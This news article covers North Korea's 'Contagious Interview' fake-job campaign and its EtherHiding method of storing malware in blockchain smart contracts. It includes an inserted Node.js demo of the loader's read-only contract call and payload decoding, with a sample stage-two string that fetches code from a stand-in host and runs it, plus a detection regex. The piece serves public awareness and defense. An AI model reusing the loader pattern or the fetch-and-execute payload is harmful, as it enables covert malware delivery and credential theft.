When Job Interviews Lead to Hacking: Inside DPRK’s EtherHiding Plot

North Korean Hackers Exploit Blockchain in Sophisticated EtherHiding Attacks

The 420 Web Desk

North Korean state-backed hackers have adopted a new tactic—embedding malicious code within blockchain smart contracts—to conduct sophisticated cyberattacks that steal credentials and cryptocurrency. Researchers say the innovation, dubbed EtherHiding, complicates global cybersecurity efforts by merging digital espionage with decentralized finance infrastructure.

A New Kind of Cyberweapon

In February, Google’s Threat Intelligence Group (GTIG) began tracking a wave of cyberattacks linked to a North Korean state-sponsored group identified internally as UNC5342. The operation, nicknamed “Contagious Interview,” disguised itself as a series of legitimate job interviews for software developers and blockchain engineers.

What made these attacks unusual was not their social engineering, a long-standing tactic in North Korean cyber operations, but their delivery system. Instead of hosting malicious payloads on compromised servers or dark web forums, the hackers used smart contracts, self-executing programs on public blockchains such as Ethereum and BNB Smart Chain (formerly Binance Smart Chain), to store and distribute their malware.

GTIG’s researchers say this method, known as EtherHiding, is a recent arrival in the threat landscape. By embedding code within a smart contract, attackers turn two properties of a public blockchain against defenders: anyone, including a victim’s machine, can read the contract without registering or authenticating, and no hosting provider, registrar or court order can take it down. The openness that underpins decentralized technology becomes the attacker’s hosting.

Weaponizing the Blockchain

First described by Guardio Labs in 2023, EtherHiding lets threat actors store malicious code in a smart contract deployed to a public blockchain. Once deployed, the code can be fetched with read-only calls, which a node executes against its current state without creating a transaction; the victim’s fetch therefore leaves no entry in the chain’s transaction history, and only the attacker’s own deployment and update transactions are recorded. The result is delivery infrastructure that is nearly impossible to take down and that reveals nothing about who is retrieving the payload.

“The low cost and frequency of these updates illustrate the attacker’s ability to easily change the campaign’s configuration,” GTIG researchers noted. Updating a malicious smart contract costs roughly a dollar in gas fees, so the attackers can swap payloads, point loaders at new second-stage servers or change configuration repeatedly without standing up new infrastructure or touching any server a defender could seize. The updates themselves are public, but nothing obliges a victim to notice them.
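As an added example, not code from GTIG, the article or the campaign, the following Node.js script shows the read-only call an EtherHiding loader makes, the ABI decoding that turns the contract’s reply into the next stage, and the contrast with the attacker’s update, which must be a recorded transaction. The contract address, the stage-two script and the RPC reply are constructed for the example (the script is never executed); the two function selectors are the standard ones for a SimpleStorage-style `get()` / `set(string)` contract. It runs offline.

```javascript
// Added example (not GTIG's, the article's or the campaign's code): the read-only
// contract call an EtherHiding loader makes, the ABI decoding that turns the reply
// into the next stage, and the contrast with the attacker's update transaction.
// Runs offline under Node.js: the RPC reply is constructed here, not captured.

// Function selectors are the first 4 bytes of keccak256(signature). These two are
// the standard ones for a SimpleStorage-style contract; recompute them with any
// keccak256 tool before relying on them against a real contract.
const SELECTOR_GET = "6d4ce63c"; // get()
const SELECTOR_SET = "4ed3885e"; // set(string)

// Hypothetical contract address and stage-two script, constructed for this example.
// The script is never executed here; it is only the string the contract returns.
const CONTRACT = "0x1111111111111111111111111111111111111111";
const STAGE2 =
  "(()=>{const h=require('https');h.get('https://example.invalid/next',r=>{" +
  "let b='';r.on('data',c=>b+=c);r.on('end',()=>new Function(b)())})})()";

// A 32-byte big-endian word holding an unsigned integer, as hex without 0x.
const word = (n) => n.toString(16).padStart(64, "0");

// ABI-encode one `string` the way Solidity returns it from a function:
// word 0 = offset of the dynamic data (32), word 1 = byte length, then the
// UTF-8 bytes right-padded with zeros to a multiple of 32 bytes.
function abiEncodeString(s) {
  const bytes = Buffer.from(s, "utf8");
  const padded = Buffer.alloc(Math.ceil(bytes.length / 32) * 32);
  bytes.copy(padded);
  return "0x" + word(32) + word(bytes.length) + padded.toString("hex");
}

// Inverse of the above: decode the `result` field of an eth_call reply.
// A loader does exactly this before handing the string to eval/new Function.
function abiDecodeString(hex) {
  const buf = Buffer.from(hex.replace(/^0x/, ""), "hex");
  if (buf.length < 64) throw new Error("too short to hold an ABI string");
  const offset = Number(buf.readBigUInt64BE(24));       // low 8 bytes of word 0
  if (offset + 32 > buf.length) throw new Error("offset outside payload");
  const len = Number(buf.readBigUInt64BE(offset + 24)); // low 8 bytes of length word
  if (offset + 32 + len > buf.length) throw new Error("length outside payload");
  return buf.subarray(offset + 32, offset + 32 + len).toString("utf8");
}

// The JSON-RPC body the loader POSTs to any public node. eth_call executes the
// function against node state and creates no transaction, so the victim's fetch
// leaves nothing on-chain. The same body works on Ethereum or BNB Smart Chain;
// only the RPC endpoint URL changes.
function buildReadRequest(contract) {
  return {
    jsonrpc: "2.0", id: 1, method: "eth_call",
    params: [{ to: contract, data: "0x" + SELECTOR_GET }, "latest"],
  };
}

// The attacker's update, by contrast, must change contract storage. That is a
// signed transaction (eth_sendRawTransaction) carrying this calldata, costs gas,
// and is permanently recorded: the one part of the scheme a defender can watch.
function buildUpdateCalldata(newPayload) {
  // set(string) takes one dynamic argument, so the argument encoding is the
  // same offset/length/data layout as the return value above.
  return "0x" + SELECTOR_SET + abiEncodeString(newPayload).slice(2);
}

// Defender side: decode a reply seen in a proxy log, or obtained by polling the
// contract yourself, and flag it when the "data" is really code.
function looksLikeScript(payload) {
  return /\b(eval|Function|require|import|fetch|XMLHttpRequest|child_process)\b/
    .test(payload);
}

// Constructed node reply, as a real node would answer buildReadRequest(CONTRACT)
// if the contract's get() returned STAGE2.
const rpcReply = { jsonrpc: "2.0", id: 1, result: abiEncodeString(STAGE2) };

function demo() {
  const request = buildReadRequest(CONTRACT);
  const payload = abiDecodeString(rpcReply.result);
  return {
    method: request.method,
    recovered: payload === STAGE2,
    flagged: looksLikeScript(payload),
    updateCalldataBytes: (buildUpdateCalldata(STAGE2).length - 2) / 2,
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

The practical lesson is in the two request shapes: the victim’s `eth_call` is invisible on-chain, so hunting has to happen on the victim side (egress to public RPC endpoints from developer workstations, `eth_call` bodies in proxy logs, decoded results that look like code), while the attacker’s `set(string)` transactions are permanent and public, so once a contract address is known its full payload history and update timing can be pulled from any block explorer.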

Because blockchain data cannot be easily erased or censored, law enforcement faces new challenges in containing such threats. “It’s the first time we’ve observed a state-backed hacker group leveraging this method,” one researcher said, calling it a “notable escalation” in cyber-espionage techniques.


Fake Jobs, Real Espionage

Investigators say the attacks typically begin with fabricated job listings posted under names like BlockNovas LLC or Angeloper Agency, front companies created to lure skilled developers. Candidates are asked to complete “technical assessments”, coding tasks whose project files contain a JavaScript downloader; when the candidate runs the code, the downloader queries the blockchain for its next, encrypted stage.

The malicious chain unfolds in stages: an initial downloader retrieves a component named JADESNOW, which queries an Ethereum smart contract to pull further payloads, including a credential-stealing module that targets passwords, credit cards, and crypto wallets such as MetaMask and Phantom.

GTIG’s analysis found that the malware can also receive instructions from command-and-control servers or Telegram, exfiltrating stolen data in ZIP files. The combination of traditional espionage tactics and blockchain infrastructure represents, experts say, a new hybrid of state-sponsored hacking.

A Warning for the Digital Economy

The use of blockchain technology for covert cyber operations blurs the line between financial systems and national security. GTIG suggests that administrators impose download restrictions on risky file types such as .EXE, .MSI, and .DLL, and enforce strict browser and script policies, particularly on enterprise networks.

Researchers also noted that some payloads run entirely in memory, further complicating detection. The use of multiple blockchains, including Ethereum and the BNB Smart Chain, may point to internal compartmentalization among North Korean hacking units—a level of operational sophistication rarely seen outside major cyber powers.

As digital assets continue to merge with global finance, experts warn that EtherHiding may be only the beginning. By embedding malware within immutable code, attackers are effectively hiding in plain sight—turning the blockchain’s greatest strength into a new frontier of vulnerability.
